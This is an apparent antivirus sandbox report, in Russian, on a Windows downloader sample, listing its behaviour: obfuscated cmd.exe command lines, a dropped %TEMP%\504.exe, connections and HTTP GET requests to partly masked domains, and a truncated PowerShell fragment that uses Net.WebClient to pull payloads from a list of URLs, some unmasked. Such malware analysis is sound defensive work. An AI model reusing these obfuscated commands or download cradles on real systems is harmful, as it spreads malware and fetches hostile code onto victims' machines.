Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b\+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\504.exe
Сетевая активность
Подключается к
- 'bu####ighter.com':80
- 'bu####ighter.com':443
- 'ch###boy.com':80
- 'au##l6.net':80
- 'te###uto.com':80
TCP
Запросы HTTP GET
- http://bu####ighter.com/mQ5tBipU
- http://ch###boy.com/ZE67diCLv
- http://au##l6.net/yobZPsMLA
- http://te###uto.com/UMTE5JuqX
Другие
- 'bu####ighter.com':443
UDP
- DNS ASK by##ara.com
- DNS ASK bu####ighter.com
- DNS ASK ch###boy.com
- DNS ASK au##l6.net
- DNS ASK te###uto.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V\C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b\+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V/C"set iC=^<$3;_KI'^<6UP}Apl7 dwohX'{CX=Nb~L~)4t~)3C3^<l$#Gf}A*C}b/+{^<fIhD#;cBQ\t]PaaKgfcDUh}I9{}7^|I;bkukw0YaA1%eUbwro@Vb}7P;5%c'W~KJn`[SrN9Qv6d'ScD=_HQfUL3JQ/IYsRv$z05;\j(ly{iWVyJD'^|.$ur=...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo $mwl='Vfs';$isD=new-object Net.WebClient;$oKP='http://by##ara.com/0i3BgTG@http://burnbrighter.com/mQ5tBipU@http://chainboy.com/ZE67diCLv@http://aural6.net/yobZPsMLA@http://tecnau...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -
